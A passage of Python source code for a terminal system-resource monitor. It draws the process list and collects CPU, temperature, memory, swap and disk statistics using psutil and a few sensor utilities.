if not "delete" in Key.mouse: Key.mouse["delete"] = [[x+12 + len(proc.search_filter[-10:]) + i, y-1] for i in range(3)]
elif "delete" in Key.mouse:
del Key.mouse["delete"]
out_misc += (f'{Mv.to(y-1, x + 8)}{THEME.proc_box(Symbol.title_left)}{Fx.b if cls.filtering or proc.search_filter else ""}{THEME.hi_fg("f")}{THEME.title}' +
("ilter" if not proc.search_filter and not cls.filtering else f' {proc.search_filter[-(10 if w < 83 else w - 74):]}{(Fx.bl + "█" + Fx.ubl) if cls.filtering else THEME.hi_fg(" del")}') +
f'{THEME.proc_box(Symbol.title_right)}')
main = THEME.inactive_fg if cls.selected == 0 else THEME.main_fg
hi = THEME.inactive_fg if cls.selected == 0 else THEME.hi_fg
title = THEME.inactive_fg if cls.selected == 0 else THEME.title
out_misc += (f'{Mv.to(y+h, x + 1)}{THEME.proc_box}{Symbol.h_line*(w-4)}'
f'{Mv.to(y+h, x+1)}{THEME.proc_box(Symbol.title_left)}{main}{Symbol.up} {Fx.b}{THEME.main_fg("select")} {Fx.ub}'
f'{THEME.inactive_fg if cls.selected == cls.select_max else THEME.main_fg}{Symbol.down}{THEME.proc_box(Symbol.title_right)}'
f'{THEME.proc_box(Symbol.title_left)}{title}{Fx.b}info {Fx.ub}{main}{Symbol.enter}{THEME.proc_box(Symbol.title_right)}')
if not "enter" in Key.mouse: Key.mouse["enter"] = [[x + 14 + i, y+h] for i in range(6)]
if w - len(loc_string) > 34:
if not "t" in Key.mouse: Key.mouse["t"] = [[x + 22 + i, y+h] for i in range(9)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}t{title}erminate{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if w - len(loc_string) > 40:
if not "k" in Key.mouse: Key.mouse["k"] = [[x + 33 + i, y+h] for i in range(4)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}k{title}ill{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if w - len(loc_string) > 51:
if not "i" in Key.mouse: Key.mouse["i"] = [[x + 39 + i, y+h] for i in range(9)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}i{title}nterrupt{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if CONFIG.proc_tree and w - len(loc_string) > 65:
if not " " in Key.mouse: Key.mouse[" "] = [[x + 50 + i, y+h] for i in range(12)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}spc {title}collapse{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
#* Processes labels
selected: str = CONFIG.proc_sorting
label: str
if selected == "memory": selected = "mem"
if selected == "threads" and not CONFIG.proc_tree and not arg_len: selected = "tr"
if CONFIG.proc_tree:
label = (f'{THEME.title}{Fx.b}{Mv.to(y, x)}{" Tree:":<{tree_len-2}}' + (f'{"Threads: ":<9}' if tr_show else " "*4) + (f'{"User:":<9}' if usr_show else "") + f'Mem%{"Cpu%":>11}{Fx.ub}{THEME.main_fg} ' +
(" " if proc.num_procs > cls.select_max else ""))
if selected in ["pid", "program", "arguments"]: selected = "tree"
else:
label = (f'{THEME.title}{Fx.b}{Mv.to(y, x)}{"Pid:":>7} {"Program:" if prog_len > 8 else "Prg:":<{prog_len}}' + (f'{"Arguments:":<{arg_len-4}}' if arg_len else "") +
((f'{"Threads:":<9}' if arg_len else f'{"Tr:":^5}') if tr_show else "") + (f'{"User:":<9}' if usr_show else "") + f'Mem%{"Cpu%":>11}{Fx.ub}{THEME.main_fg} ' +
(" " if proc.num_procs > cls.select_max else ""))
if selected == "program" and prog_len <= 8: selected = "prg"
selected = selected.split(" ")[0].capitalize()
if CONFIG.proc_mem_bytes: label = label.replace("Mem%", "MemB")
label = label.replace(selected, f'{Fx.u}{selected}{Fx.uu}')
out_misc += label
Draw.buffer("proc_misc", out_misc, only_save=True)
#* Detailed box draw
if proc.detailed:
if proc.details["status"] == psutil.STATUS_RUNNING: stat_color = Fx.b
elif proc.details["status"] in [psutil.STATUS_DEAD, psutil.STATUS_STOPPED, psutil.STATUS_ZOMBIE]: stat_color = f'{THEME.inactive_fg}'
else: stat_color = ""
expand = proc.expand
iw = (dw - 3) // (4 + expand)
iw2 = iw - 1
out += (f'{Mv.to(dy, dgx)}{Graphs.detailed_cpu(None if cls.moved or proc.details["killed"] else proc.details_cpu[-1])}'
f'{Mv.to(dy, dgx)}{THEME.title}{Fx.b}{0 if proc.details["killed"] else proc.details["cpu_percent"]}%{Mv.r(1)}{"" if SYSTEM == "MacOS" else (("C" if dgw < 20 else "Core") + str(proc.details["cpu_num"]))}')
for i, l in enumerate(["C", "P", "U"]):
out += f'{Mv.to(dy+2+i, dgx)}{l}'
for i, l in enumerate(["C", "M", "D"]):
out += f'{Mv.to(dy+4+i, dx+1)}{l}'
out += (f'{Mv.to(dy, dx+1)} {"Status:":^{iw}.{iw2}}{"Elapsed:":^{iw}.{iw2}}' +
(f'{"Parent:":^{iw}.{iw2}}' if dw > 28 else "") + (f'{"User:":^{iw}.{iw2}}' if dw > 38 else "") +
(f'{"Threads:":^{iw}.{iw2}}' if expand > 0 else "") + (f'{"Nice:":^{iw}.{iw2}}' if expand > 1 else "") +
(f'{"IO Read:":^{iw}.{iw2}}' if expand > 2 else "") + (f'{"IO Write:":^{iw}.{iw2}}' if expand > 3 else "") +
(f'{"TTY:":^{iw}.{iw2}}' if expand > 4 else "") +
f'{Mv.to(dy+1, dx+1)}{Fx.ub}{THEME.main_fg}{stat_color}{proc.details["status"]:^{iw}.{iw2}}{Fx.ub}{THEME.main_fg}{proc.details["uptime"]:^{iw}.{iw2}} ' +
(f'{proc.details["parent_name"]:^{iw}.{iw2}}' if dw > 28 else "") + (f'{proc.details["username"]:^{iw}.{iw2}}' if dw > 38 else "") +
(f'{proc.details["threads"]:^{iw}.{iw2}}' if expand > 0 else "") + (f'{proc.details["nice"]:^{iw}.{iw2}}' if expand > 1 else "") +
(f'{proc.details["io_read"]:^{iw}.{iw2}}' if expand > 2 else "") + (f'{proc.details["io_write"]:^{iw}.{iw2}}' if expand > 3 else "") +
(f'{proc.details["terminal"][-(iw2):]:^{iw}.{iw2}}' if expand > 4 else "") +
f'{Mv.to(dy+3, dx)}{THEME.title}{Fx.b}{("Memory: " if dw > 42 else "M:") + str(round(proc.details["memory_percent"], 1)) + "%":>{dw//3-1}}{Fx.ub} {THEME.inactive_fg}{"⡀"*(dw//3)}'
f'{Mv.l(dw//3)}{THEME.proc_misc}{Graphs.detailed_mem(None if cls.moved else proc.details_mem[-1])} '
f'{THEME.title}{Fx.b}{proc.details["memory_bytes"]:.{dw//3 - 2}}{THEME.main_fg}{Fx.ub}')
cy = dy + (4 if len(proc.details["cmdline"]) > dw - 5 else 5)
for i in range(ceil(len(proc.details["cmdline"]) / (dw - 5))):
out += f'{Mv.to(cy+i, dx + 3)}{proc.details["cmdline"][((dw-5)*i):][:(dw-5)]:{"^" if i == 0 else "<"}{dw-5}}'
if i == 2: break
#* Checking for selection out of bounds
if cls.start > proc.num_procs - cls.select_max + 1 and proc.num_procs > cls.select_max: cls.start = proc.num_procs - cls.select_max + 1
elif cls.start > proc.num_procs: cls.start = proc.num_procs
if cls.start < 1: cls.start = 1
if cls.selected > proc.num_procs and proc.num_procs < cls.select_max: cls.selected = proc.num_procs
elif cls.selected > cls.select_max: cls.selected = cls.select_max
if cls.selected < 0: cls.selected = 0
#* Start iteration over all processes and info
cy = 1
for n, (pid, items) in enumerate(proc.processes.items(), start=1):
if n < cls.start: continue
l_count += 1
if l_count == cls.selected:
is_selected = True
cls.selected_pid = pid
else: is_selected = False
indent, name, cmd, threads, username, mem, mem_b, cpu = [items.get(v, d) for v, d in [("indent", ""), ("name", ""), ("cmd", ""), ("threads", 0), ("username", "?"), ("mem", 0.0), ("mem_b", 0), ("cpu", 0.0)]]
if CONFIG.proc_tree:
arg_len = 0
offset = tree_len - len(f'{indent}{pid}')
if offset < 1: offset = 0
indent = f'{indent:.{tree_len - len(str(pid))}}'
if offset - len(name) > 12:
cmd = cmd.split(" ")[0].split("/")[-1]
if not cmd.startswith(name):
offset = len(name)
arg_len = tree_len - len(f'{indent}{pid} {name} ') + 2
cmd = f'({cmd[:(arg_len-4)]})'
else:
offset = prog_len - 1
if cpu > 1.0 or pid in Graphs.pid_cpu:
if pid not in Graphs.pid_cpu:
Graphs.pid_cpu[pid] = Graph(5, 1, None, [0])
cls.pid_counter[pid] = 0
elif cpu < 1.0:
cls.pid_counter[pid] += 1
if cls.pid_counter[pid] > 10:
del cls.pid_counter[pid], Graphs.pid_cpu[pid]
else:
cls.pid_counter[pid] = 0
end = f'{THEME.main_fg}{Fx.ub}' if CONFIG.proc_colors else Fx.ub
if cls.selected > cy: calc = cls.selected - cy
elif 0 < cls.selected <= cy: calc = cy - cls.selected
else: calc = cy
if CONFIG.proc_colors and not is_selected:
vals = []
for v in [int(cpu), int(mem), int(threads // 3)]:
if CONFIG.proc_gradient:
val = ((v if v <= 100 else 100) + 100) - calc * 100 // cls.select_max
vals += [f'{THEME.gradient["proc_color" if val < 100 else "process"][val if val < 100 else val - 100]}']
else:
vals += [f'{THEME.gradient["process"][v if v <= 100 else 100]}']
c_color, m_color, t_color = vals
else:
c_color = m_color = t_color = Fx.b
if CONFIG.proc_gradient and not is_selected:
g_color = f'{THEME.gradient["proc"][calc * 100 // cls.select_max]}'
if is_selected:
c_color = m_color = t_color = g_color = end = ""
out += f'{THEME.selected_bg}{THEME.selected_fg}{Fx.b}'
#* Creates one line for a process with all gathered information
out += (f'{Mv.to(y+cy, x)}{g_color}{indent}{pid:>{(1 if CONFIG.proc_tree else 7)}} ' +
f'{c_color}{name:<{offset}.{offset}} {end}' +
(f'{g_color}{cmd:<{arg_len}.{arg_len-1}}' if arg_len else "") +
(t_color + (f'{threads:>4} ' if threads < 1000 else "999> ") + end if tr_show else "") +
(g_color + (f'{username:<9.9}' if len(username) < 10 else f'{username[:8]:<8}+') if usr_show else "") +
m_color + ((f'{mem:>4.1f}' if mem < 100 else f'{mem:>4.0f} ') if not CONFIG.proc_mem_bytes else f'{floating_humanizer(mem_b, short=True):>4.4}') + end +
f' {THEME.inactive_fg}{"⡀"*5}{THEME.main_fg}{g_color}{c_color}' + (f' {cpu:>4.1f} ' if cpu < 100 else f'{cpu:>5.0f} ') + end +
(" " if proc.num_procs > cls.select_max else ""))
#* Draw small cpu graph for process if cpu usage was above 1% in the last 10 updates
if pid in Graphs.pid_cpu:
out += f'{Mv.to(y+cy, x + w - (12 if proc.num_procs > cls.select_max else 11))}{c_color if CONFIG.proc_colors else THEME.proc_misc}{Graphs.pid_cpu[pid](None if cls.moved else round(cpu))}{THEME.main_fg}'
if is_selected: out += f'{Fx.ub}{Term.fg}{Term.bg}{Mv.to(y+cy, x + w - 1)}{" " if proc.num_procs > cls.select_max else ""}'
cy += 1
if cy == h: break
if cy < h:
for i in range(h-cy):
out += f'{Mv.to(y+cy+i, x)}{" " * w}'
#* Draw scrollbar if needed
if proc.num_procs > cls.select_max:
if cls.resized:
Key.mouse["mouse_scroll_up"] = [[x+w-2+i, y] for i in range(3)]
Key.mouse["mouse_scroll_down"] = [[x+w-2+i, y+h-1] for i in range(3)]
scroll_pos = round(cls.start * (cls.select_max - 2) / (proc.num_procs - (cls.select_max - 2)))
if scroll_pos < 0 or cls.start == 1: scroll_pos = 0
elif scroll_pos > h - 3 or cls.start >= proc.num_procs - cls.select_max: scroll_pos = h - 3
out += (f'{Mv.to(y, x+w-1)}{Fx.b}{THEME.main_fg}↑{Mv.to(y+h-1, x+w-1)}↓{Fx.ub}'
f'{Mv.to(y+1+scroll_pos, x+w-1)}█')
elif "scroll_up" in Key.mouse:
del Key.mouse["scroll_up"], Key.mouse["scroll_down"]
#* Draw current selection and number of processes
out += (f'{Mv.to(y+h, x + w - 3 - len(loc_string))}{THEME.proc_box}{Symbol.title_left}{THEME.title}'
f'{Fx.b}{loc_string}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
#* Clean up dead processes graphs and counters
cls.count += 1
if cls.count == 100:
cls.count == 0
for p in list(cls.pid_counter):
if not psutil.pid_exists(p):
del cls.pid_counter[p], Graphs.pid_cpu[p]
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.redraw = cls.resized = cls.moved = False
class Collector:
'''Data collector master class
* .start(): Starts collector thread
* .stop(): Stops collector thread
* .collect(*collectors: Collector, draw_now: bool = True, interrupt: bool = False): queues up collectors to run'''
stopping: bool = False
started: bool = False
draw_now: bool = False
redraw: bool = False
only_draw: bool = False
thread: threading.Thread
collect_run = threading.Event()
collect_idle = threading.Event()
collect_idle.set()
collect_done = threading.Event()
collect_queue: List = []
collect_interrupt: bool = False
proc_interrupt: bool = False
use_draw_list: bool = False
proc_counter: int = 1
@classmethod
def start(cls):
cls.stopping = False
cls.thread = threading.Thread(target=cls._runner, args=())
cls.thread.start()
cls.started = True
@classmethod
def stop(cls):
if cls.started and cls.thread.is_alive():
cls.stopping = True
cls.started = False
cls.collect_queue = []
cls.collect_idle.set()
cls.collect_done.set()
try:
cls.thread.join()
except:
pass
@classmethod
def _runner(cls):
'''This is meant to run in it's own thread, collecting and drawing when collect_run is set'''
draw_buffers: List[str] = []
debugged: bool = False
try:
while not cls.stopping:
if CONFIG.draw_clock and CONFIG.update_ms != 1000: Box.draw_clock()
cls.collect_run.wait(0.1)
if not cls.collect_run.is_set():
continue
draw_buffers = []
cls.collect_interrupt = False
cls.collect_run.clear()
cls.collect_idle.clear()
cls.collect_done.clear()
if DEBUG and not debugged: TimeIt.start("Collect and draw")
while cls.collect_queue:
collector = cls.collect_queue.pop()
if not cls.only_draw:
collector._collect()
collector._draw()
if cls.use_draw_list: draw_buffers.append(collector.buffer)
if cls.collect_interrupt: break
if DEBUG and not debugged: TimeIt.stop("Collect and draw"); debugged = True
if cls.draw_now and not Menu.active and not cls.collect_interrupt:
if cls.use_draw_list: Draw.out(*draw_buffers)
else: Draw.out()
if CONFIG.draw_clock and CONFIG.update_ms == 1000: Box.draw_clock()
cls.collect_idle.set()
cls.collect_done.set()
except Exception as e:
errlog.exception(f'Data collection thread failed with exception: {e}')
cls.collect_idle.set()
cls.collect_done.set()
clean_quit(1, thread=True)
@classmethod
def collect(cls, *collectors, draw_now: bool = True, interrupt: bool = False, proc_interrupt: bool = False, redraw: bool = False, only_draw: bool = False):
'''Setup collect queue for _runner'''
cls.collect_interrupt = interrupt
cls.proc_interrupt = proc_interrupt
cls.collect_idle.wait()
cls.collect_interrupt = False
cls.proc_interrupt = False
cls.use_draw_list = False
cls.draw_now = draw_now
cls.redraw = redraw
cls.only_draw = only_draw
if collectors:
cls.collect_queue = [*collectors]
cls.use_draw_list = True
if ProcCollector in cls.collect_queue:
cls.proc_counter = 1
else:
cls.collect_queue = list(cls.__subclasses__())
if CONFIG.proc_update_mult > 1:
if cls.proc_counter > 1:
cls.collect_queue.remove(ProcCollector)
if cls.proc_counter == CONFIG.proc_update_mult:
cls.proc_counter = 0
cls.proc_counter += 1
cls.collect_run.set()
class CpuCollector(Collector):
'''Collects cpu usage for cpu and cores, cpu frequency, load_avg, uptime and cpu temps'''
cpu_usage: List[List[int]] = []
cpu_temp: List[List[int]] = []
cpu_temp_high: int = 0
cpu_temp_crit: int = 0
for _ in range(THREADS + 1):
cpu_usage.append([])
cpu_temp.append([])
freq_error: bool = False
cpu_freq: int = 0
load_avg: List[float] = []
uptime: str = ""
buffer: str = CpuBox.buffer
sensor_method: str = ""
got_sensors: bool = False
sensor_swap: bool = False
cpu_temp_only: bool = False
@classmethod
def get_sensors(cls):
'''Check if we can get cpu temps and return method of getting temps'''
cls.sensor_method = ""
if SYSTEM == "MacOS":
try:
if which("coretemp") and subprocess.check_output(["coretemp", "-p"], universal_newlines=True).strip().replace("-", "").isdigit():
cls.sensor_method = "coretemp"
elif which("osx-cpu-temp") and subprocess.check_output("osx-cpu-temp", universal_newlines=True).rstrip().endswith("°C"):
cls.sensor_method = "osx-cpu-temp"
except: pass
elif CONFIG.cpu_sensor != "Auto" and CONFIG.cpu_sensor in CONFIG.cpu_sensors:
cls.sensor_method = "psutil"
elif hasattr(psutil, "sensors_temperatures"):
try:
temps = psutil.sensors_temperatures()
if temps:
for name, entries in temps.items():
if name.lower().startswith("cpu"):
cls.sensor_method = "psutil"
break
for entry in entries:
if entry.label.startswith(("Package", "Core 0", "Tdie", "CPU")):
cls.sensor_method = "psutil"
break
except: pass
if not cls.sensor_method and SYSTEM == "Linux":
try:
if which("vcgencmd") and subprocess.check_output(["vcgencmd", "measure_temp"], universal_newlines=True).strip().endswith("'C"):
cls.sensor_method = "vcgencmd"
except: pass
cls.got_sensors = bool(cls.sensor_method)
@classmethod
def _collect(cls):
cls.cpu_usage[0].append(round(psutil.cpu_percent(percpu=False)))
if len(cls.cpu_usage[0]) > Term.width * 4:
del cls.cpu_usage[0][0]
for n, thread in enumerate(psutil.cpu_percent(percpu=True), start=1):
cls.cpu_usage[n].append(round(thread))
if len(cls.cpu_usage[n]) > Term.width * 2:
del cls.cpu_usage[n][0]
try:
if hasattr(psutil.cpu_freq(), "current"):
cls.cpu_freq = round(psutil.cpu_freq().current)
except Exception as e:
if not cls.freq_error:
cls.freq_error = True
errlog.error("Exception while getting cpu frequency!")
errlog.exception(f'{e}')
else:
pass
cls.load_avg = [round(lavg, 2) for lavg in os.getloadavg()]
cls.uptime = str(timedelta(seconds=round(time()-psutil.boot_time(),0)))[:-3]
if CONFIG.check_temp and cls.got_sensors:
cls._collect_temps()
@classmethod
def _collect_temps(cls):
temp: int = 1000
cores: List[int] = []
core_dict: Dict[int, int] = {}
entry_int: int = 0
cpu_type: str = ""
c_max: int = 0
s_name: str = "_-_"
s_label: str = "_-_"
if cls.sensor_method == "psutil":
try:
if CONFIG.cpu_sensor != "Auto":
s_name, s_label = CONFIG.cpu_sensor.split(":", 1)
for name, entries in psutil.sensors_temperatures().items():
for num, entry in enumerate(entries, 1):
if name == s_name and (entry.label == s_label or str(num) == s_label) and round(entry.current) > 0:
if entry.label.startswith("Package"):
cpu_type = "intel"
elif entry.label.startswith("Tdie"):
cpu_type = "ryzen"
else:
cpu_type = "other"
if getattr(entry, "high", None) != None and entry.high > 1: cls.cpu_temp_high = round(entry.high)
else: cls.cpu_temp_high = 80
if getattr(entry, "critical", None) != None and entry.critical > 1: cls.cpu_temp_crit = round(entry.critical)
else: cls.cpu_temp_crit = 95
temp = round(entry.current)
elif entry.label.startswith(("Package", "Tdie")) and cpu_type in ["", "other"] and s_name == "_-_" and hasattr(entry, "current") and round(entry.current) > 0:
if not cls.cpu_temp_high or cls.sensor_swap or cpu_type == "other":
cls.sensor_swap = False
if getattr(entry, "high", None) != None and entry.high > 1: cls.cpu_temp_high = round(entry.high)
else: cls.cpu_temp_high = 80
if getattr(entry, "critical", None) != None and entry.critical > 1: cls.cpu_temp_crit = round(entry.critical)
else: cls.cpu_temp_crit = 95
cpu_type = "intel" if entry.label.startswith("Package") else "ryzen"
temp = round(entry.current)
elif (entry.label.startswith(("Core", "Tccd", "CPU")) or (name.lower().startswith("cpu") and not entry.label)) and hasattr(entry, "current") and round(entry.current) > 0:
if entry.label.startswith(("Core", "Tccd")):
entry_int = int(entry.label.replace("Core", "").replace("Tccd", ""))
if entry_int in core_dict and cpu_type != "ryzen":
if c_max == 0:
c_max = max(core_dict) + 1
if c_max < THREADS // 2 and (entry_int + c_max) not in core_dict:
core_dict[(entry_int + c_max)] = round(entry.current)
continue
elif entry_int in core_dict:
continue
core_dict[entry_int] = round(entry.current)
continue
elif cpu_type in ["intel", "ryzen"]:
continue
if not cpu_type:
cpu_type = "other"
if not cls.cpu_temp_high or cls.sensor_swap:
cls.sensor_swap = False
if getattr(entry, "high", None) != None and entry.high > 1: cls.cpu_temp_high = round(entry.high)
else: cls.cpu_temp_high = 60 if name == "cpu_thermal" else 80
if getattr(entry, "critical", None) != None and entry.critical > 1: cls.cpu_temp_crit = round(entry.critical)
else: cls.cpu_temp_crit = 80 if name == "cpu_thermal" else 95
temp = round(entry.current)
cores.append(round(entry.current))
if core_dict:
if not temp or temp == 1000:
temp = sum(core_dict.values()) // len(core_dict)
if not cls.cpu_temp_high or not cls.cpu_temp_crit:
cls.cpu_temp_high, cls.cpu_temp_crit = 80, 95
cls.cpu_temp[0].append(temp)
if cpu_type == "ryzen":
ccds: int = len(core_dict)
cores_per_ccd: int = CORES // ccds
z: int = 1
for x in range(THREADS):
if x == CORES:
z = 1
if CORE_MAP[x] + 1 > cores_per_ccd * z:
z += 1
if z in core_dict:
cls.cpu_temp[x+1].append(core_dict[z])
else:
for x in range(THREADS):
if CORE_MAP[x] in core_dict:
cls.cpu_temp[x+1].append(core_dict[CORE_MAP[x]])
elif len(cores) == THREADS / 2:
cls.cpu_temp[0].append(temp)
for n, t in enumerate(cores, start=1):
try:
cls.cpu_temp[n].append(t)
cls.cpu_temp[THREADS // 2 + n].append(t)
except IndexError:
break
else:
cls.cpu_temp[0].append(temp)
if len(cores) > 1:
for n, t in enumerate(cores, start=1):
try:
cls.cpu_temp[n].append(t)
except IndexError:
break
except Exception as e:
errlog.exception(f'{e}')
cls.got_sensors = False
CpuBox._calc_size()
else:
try:
if cls.sensor_method == "coretemp":
temp = max(0, int(subprocess.check_output(["coretemp", "-p"], universal_newlines=True).strip()))
cores = [max(0, int(x)) for x in subprocess.check_output("coretemp", universal_newlines=True).split()]
if len(cores) == THREADS / 2:
cls.cpu_temp[0].append(temp)
for n, t in enumerate(cores, start=1):
try:
cls.cpu_temp[n].append(t)
cls.cpu_temp[THREADS // 2 + n].append(t)
except IndexError:
break
else:
cores.insert(0, temp)
for n, t in enumerate(cores):
try:
cls.cpu_temp[n].append(t)
except IndexError:
break
if not cls.cpu_temp_high:
cls.cpu_temp_high = 85
cls.cpu_temp_crit = 100
elif cls.sensor_method == "osx-cpu-temp":
temp = max(0, round(float(subprocess.check_output("osx-cpu-temp", universal_newlines=True).strip()[:-2])))
if not cls.cpu_temp_high:
cls.cpu_temp_high = 85
cls.cpu_temp_crit = 100
elif cls.sensor_method == "vcgencmd":
temp = max(0, round(float(subprocess.check_output(["vcgencmd", "measure_temp"], universal_newlines=True).strip()[5:-2])))
if not cls.cpu_temp_high:
cls.cpu_temp_high = 60
cls.cpu_temp_crit = 80
except Exception as e:
errlog.exception(f'{e}')
cls.got_sensors = False
CpuBox._calc_size()
else:
if not cores:
cls.cpu_temp[0].append(temp)
if not core_dict and len(cores) <= 1:
cls.cpu_temp_only = True
if len(cls.cpu_temp[0]) > 5:
for n in range(len(cls.cpu_temp)):
if cls.cpu_temp[n]:
del cls.cpu_temp[n][0]
@classmethod
def _draw(cls):
CpuBox._draw_fg()
class MemCollector(Collector):
'''Collects memory and disks information'''
values: Dict[str, int] = {}
vlist: Dict[str, List[int]] = {}
percent: Dict[str, int] = {}
string: Dict[str, str] = {}
swap_values: Dict[str, int] = {}
swap_vlist: Dict[str, List[int]] = {}
swap_percent: Dict[str, int] = {}
swap_string: Dict[str, str] = {}
disks: Dict[str, Dict]
disk_hist: Dict[str, Tuple] = {}
timestamp: float = time()
io_error: bool = False
old_disks: List[str] = []
fstab_filter: List[str] = []
excludes: List[str] = ["squashfs", "nullfs"]
if SYSTEM == "BSD": excludes += ["devfs", "tmpfs", "procfs", "linprocfs", "gvfs", "fusefs"]
buffer: str = MemBox.buffer
@classmethod
def _collect(cls):
#* Collect memory
mem = psutil.virtual_memory()
if hasattr(mem, "cached"):
cls.values["cached"] = mem.cached
else:
cls.values["cached"] = mem.active
cls.values["total"], cls.values["free"], cls.values["available"] = mem.total, mem.free, mem.available
cls.values["used"] = cls.values["total"] - cls.values["available"]
for key, value in cls.values.items():
cls.string[key] = floating_humanizer(value)
if key == "total": continue
cls.percent[key] = round(value * 100 / cls.values["total"])
if CONFIG.mem_graphs:
if not key in cls.vlist: cls.vlist[key] = []
cls.vlist[key].append(cls.percent[key])
if len(cls.vlist[key]) > MemBox.width: del cls.vlist[key][0]
#* Collect swap
if CONFIG.show_swap or CONFIG.swap_disk:
swap = psutil.swap_memory()
cls.swap_values["total"], cls.swap_values["free"] = swap.total, swap.free
cls.swap_values["used"] = cls.swap_values["total"] - cls.swap_values["free"]
if swap.total:
if not MemBox.swap_on:
MemBox.redraw = True
MemBox.swap_on = True
for key, value in cls.swap_values.items():
cls.swap_string[key] = floating_humanizer(value)
if key == "total": continue
cls.swap_percent[key] = round(value * 100 / cls.swap_values["total"])
if CONFIG.mem_graphs:
if not key in cls.swap_vlist: cls.swap_vlist[key] = []
cls.swap_vlist[key].append(cls.swap_percent[key])
if len(cls.swap_vlist[key]) > MemBox.width: del cls.swap_vlist[key][0]
else:
if MemBox.swap_on:
MemBox.redraw = True
MemBox.swap_on = False
else:
if MemBox.swap_on:
MemBox.redraw = True
MemBox.swap_on = False
if not CONFIG.show_disks: return
#* Collect disks usage
disk_read: int = 0
disk_write: int = 0
dev_name: str
disk_name: str
filtering: Tuple = ()
filter_exclude: bool = False
io_string: str
u_percent: int
disk_list: List[str] = []
cls.disks = {}
if CONFIG.disks_filter:
if CONFIG.disks_filter.startswith("exclude="):
filter_exclude = True
filtering = tuple(v.strip() for v in CONFIG.disks_filter.replace("exclude=", "").strip().split(","))
else:
filtering = tuple(v.strip() for v in CONFIG.disks_filter.strip().split(","))
try:
io_counters = psutil.disk_io_counters(perdisk=SYSTEM == "Linux", nowrap=True)
except ValueError as e:
if not cls.io_error:
cls.io_error = True
errlog.error(f'Non fatal error during disk io collection!')
if psutil.version_info[0] < 5 or (psutil.version_info[0] == 5 and psutil.version_info[1] < 7):
errlog.error(f'Caused by outdated psutil version.')
errlog.exception(f'{e}')
io_counters = None
if CONFIG.use_fstab and SYSTEM != "MacOS" and not cls.fstab_filter:
try:
with open('/etc/fstab','r') as fstab:
for line in fstab:
line = line.strip()
if line and not line.startswith('#'):
mount_data = (line.split())
if mount_data[2].lower() != "swap":
cls.fstab_filter += [mount_data[1]]
errlog.debug(f'new fstab_filter set : {cls.fstab_filter}')
except IOError:
CONFIG.use_fstab = False
errlog.debug(f'Error reading fstab, use_fstab flag reset to {CONFIG.use_fstab}')
if not CONFIG.use_fstab and cls.fstab_filter:
cls.fstab_filter = []
errlog.debug(f'use_fstab flag has been turned to {CONFIG.use_fstab}, fstab_filter cleared')
for disk in psutil.disk_partitions(all=CONFIG.use_fstab or not CONFIG.only_physical):
disk_io = None
io_string = ""
if CONFIG.use_fstab and disk.mountpoint not in cls.fstab_filter:
continue
disk_name = disk.mountpoint.rsplit('/', 1)[-1] if not disk.mountpoint == "/" else "root"
#while disk_name in disk_list: disk_name += "_"
disk_list += [disk_name]
if cls.excludes and disk.fstype in cls.excludes:
continue
if filtering and ((not filter_exclude and not disk.mountpoint in filtering) or (filter_exclude and disk.mountpoint in filtering)):
continue
#elif filtering and disk_name.endswith(filtering)
if SYSTEM == "MacOS" and disk.mountpoint == "/private/var/vm":
continue
try:
disk_u = psutil.disk_usage(disk.mountpoint)
except:
pass
u_percent = round(disk_u.percent)
cls.disks[disk.device] = { "name" : disk_name, "used_percent" : u_percent, "free_percent" : 100 - u_percent }
for name in ["total", "used", "free"]:
cls.disks[disk.device][name] = floating_humanizer(getattr(disk_u, name, 0))
#* Collect disk io
if io_counters:
try:
if SYSTEM == "Linux":
dev_name = os.path.realpath(disk.device).rsplit('/', 1)[-1]
if dev_name.startswith("md"):
try:
dev_name = dev_name[:dev_name.index("p")]
except:
pass
disk_io = io_counters[dev_name]
elif disk.mountpoint == "/":
disk_io = io_counters
else:
raise Exception
disk_read = round((disk_io.read_bytes - cls.disk_hist[disk.device][0]) / (time() - cls.timestamp))
disk_write = round((disk_io.write_bytes - cls.disk_hist[disk.device][1]) / (time() - cls.timestamp))
except:
disk_read = disk_write = 0
else:
disk_read = disk_write = 0
if disk_io:
cls.disk_hist[disk.device] = (disk_io.read_bytes, disk_io.write_bytes)
if MemBox.disks_width > 30:
if disk_read > 0:
io_string += f'▲{floating_humanizer(disk_read, short=True)} '
if disk_write > 0:
io_string += f'▼{floating_humanizer(disk_write, short=True)}'
elif disk_read + disk_write > 0:
io_string += f'▼▲{floating_humanizer(disk_read + disk_write, short=True)}'
cls.disks[disk.device]["io"] = io_string
if CONFIG.swap_disk and MemBox.swap_on:
cls.disks["__swap"] = { "name" : "swap", "used_percent" : cls.swap_percent["used"], "free_percent" : cls.swap_percent["free"], "io" : "" }
for name in ["total", "used", "free"]:
cls.disks["__swap"][name] = cls.swap_string[name]
if len(cls.disks) > 2:
try:
new = { list(cls.disks)[0] : cls.disks.pop(list(cls.disks)[0])}
new["__swap"] = cls.disks.pop("__swap")
new.update(cls.disks)
cls.disks = new
except:
pass
if disk_list != cls.old_disks:
MemBox.redraw = True
cls.old_disks = disk_list.copy()
cls.timestamp = time()
@classmethod
def _draw(cls):
MemBox._draw_fg()
class NetCollector(Collector):
'''Collects network stats'''
buffer: str = NetBox.buffer
nics: List[str] = []
nic_i: int = 0
nic: str = ""
new_nic: str = ""
nic_error: bool = False
reset: bool = False
graph_raise: Dict[str, int] = {"download" : 5, "upload" : 5}
graph_lower: Dict[str, int] = {"download" : 5, "upload" : 5}
#min_top: int = 10<<10
#* Stats structure = stats[netword device][download, upload][total, last, top, graph_top, offset, speed, redraw, graph_raise, graph_low] = int, List[int], bool
stats: Dict[str, Dict[str, Dict[str, Any]]] = {}
#* Strings structure strings[network device][download, upload][total, byte_ps, bit_ps, top, graph_top] = str
strings: Dict[str, Dict[str, Dict[str, str]]] = {}
switched: bool = False
timestamp: float = time()
net_min: Dict[str, int] = {"download" : -1, "upload" : -1}
auto_min: bool = CONFIG.net_auto
